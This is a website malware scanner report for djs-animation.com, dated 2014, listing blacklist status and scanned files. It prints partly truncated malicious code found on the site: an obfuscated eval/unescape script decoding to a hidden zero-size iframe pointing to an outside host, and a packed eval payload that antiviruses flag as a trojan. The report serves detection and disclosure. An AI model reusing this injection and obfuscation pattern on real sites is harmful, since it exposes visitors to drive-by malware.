New scan:

Malware Scanner report for djs-animation.com

Malicious/Suspicious/Total urls checked
2/0/3
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "djs-animation.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=djs-animation.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://djs-animation.com/
200 OK
Content-Length: 5699
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var wsqWQBPps = "cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62cNRoPJdqz6ccNRoPJdqz6fcNRoPJdqz67cNRoPJdqz2
... 1297 bytes are skipped ...
65cNRoPJdqz69cNRoPJdqz67cNRoPJdqz68cNRoPJdqz74cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz62cNRoPJdqz6fcNRoPJdqz72cNRoPJdqz64cNRoPJdqz65cNRoPJdqz72cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz3ecNRoPJdqz3ccNRoPJdqz2fcNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3e"; yvDFQwwmM = eval; var WSxQJgvuB = wsqWQBPps.replace(/cNRoPJdqz/g, "%"); yvDFQwwmM("document.write(unescape(WSxQJgvuB))");

Decoded script:


document.write(unescape(WSxQJgvuB))
document.write(unescape(WSxQJgvuB))
<iframe src="http://private3.zapto.org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&amp;hrytewsfd=9889439&amp;yjresfd=854" name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0"></iframe>

Antivirus reports:

Rising
Hack.Exploit.Win32.HTML.Iframe.fir

http://djs-animation.com/AC_RunActiveContent.js
200 OK
Content-Length: 22596
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('z R(f){q.2W=z(a,b){p c=\'\';2H(p i=0;i<b.J;i++){c+=K.E(a.U(i%a.J)^b.U(i))}N c};q.X=z(h){O(h.C(\':\'))h=h.S(\':\')[0];p a=h.S(\'.\');T(a.J>2){a.2G()}N a.2F(\'.\')}
... 21648 bytes are skipped ...
odDQxPT08MHgddW0FGT0oQBgIPRw0hDAkPWA9OHBwDBxsbCh1aERoDWxkaSVwMBhkPER0wD14KXU9NUXkNQU5JTUFUSU9ODkMGCxYHXV4VFwUITwMACxpGQ1JNRloDVUNVY01BVElPTg5DT01EShpLEwNHHhUNBQpARgYGCgweUxBBTFkdGVZSZU4OQ09NREpTDUFOSQQHBgRBHVoaAwhKHBpeCAwAAQgAEE9TDkEHBAAOFkNDVWNNQVRJT04OQ09NREoXQgIbBAgPAEcNAUoaQQwUGhZDBS0BBA0QQQYIXA5GVm5jUw1BTgALExUECjlPECwfAQsHSAVOVE0VBhwKVSRDT01ESlMNQRNjTUFUSRINTxcMBUwPWlZrZwALExUECjlPECwfAQsHSAVOVE0UGg0KCEcNCglfYFMNQU4UZxxYSV5eHkpUZw|typeof|_typeof_|undefined|else|rRZdGTGGK'.split('|'),0,{}))

Antivirus reports:

AntiVir
JS/Blacofus.A.2
Avast
JS:Obfuscated-GA [Trj]
Ikarus
Trojan.JS.Blacofus
nProtect
JS:Trojan.Script.WY
Emsisoft
JS:Trojan.Script.WY (B)
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/Blacofus.A
F-Secure
JS:Trojan.Script.WY
AVG
Exploit
GData
JS:Trojan.Script.WY
BitDefender
JS:Trojan.Script.WY

http://djs-animation.com/test404page.js
404 Not Found
Content-Length: 279
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: djs-animation.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Mar 2014 08:42:17 GMT
Accept-Ranges: bytes
ETag: "ac8026-1643-4e14fe811f6c0"
Server: Apache
Content-Length: 5699
Content-Type: text/html
Last-Modified: Fri, 12 Jul 2013 12:46:59 GMT
X-Powered-By: PleskLin

...5699 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: djs-animation.com
Referer: http://www.google.com/search?q=djs-animation.com

Result:
The result is similar to the first query. There are no suspicious redirects found.